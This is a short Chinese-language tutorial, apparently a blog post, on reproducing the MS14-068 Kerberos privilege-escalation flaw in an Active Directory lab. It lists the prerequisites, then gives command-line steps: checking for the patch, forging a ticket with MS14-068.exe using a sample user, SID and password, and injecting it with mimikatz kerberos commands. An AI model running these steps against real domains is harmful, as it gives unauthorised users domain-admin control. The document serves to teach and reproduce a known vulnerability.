域滲透之MS14-68域提權漏洞
漏洞概述
漏洞可能允許攻擊者將未經授權的域用戶賬戶的權限,提權到域管理員的權限。
利用條件
域控機器沒有打MS14-068的補丁(KB3011780)
需要一個域內用戶和域內用戶密碼或hash,域內用戶的suid
漏洞原理
服務票據是客戶端直接發送給服務器,並請求服務資源的。如果服務器沒有向域控dc驗證pac的話,那麼客戶端可以僞造域管的權限來訪問服務器
MS14-068漏洞分析:Kerberos協議探索系列之票據篇
漏洞復現
查詢域控機器是否存在該補丁
systeminfo |find "3011780"
C:\Users\douser\Desktop>dir \\192.168.183.130\c$
拒絕訪問。
使用普通用戶權限,測試訪問域控的C盤共享,訪問被拒絕
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
MS14-068.exe -u douser@demo -s S-1-5-21-979886063-111190
0045-1414766810-1107 -d 192.168.183.130 -p Dotest123
這裏獲取到一個[email protected]
文件
清空票據
kerberos::purge //清空已有票據
kerberos::list //查看票據
注入票據
kerberos::ptc [email protected]
mimikatz 不支持03系統注入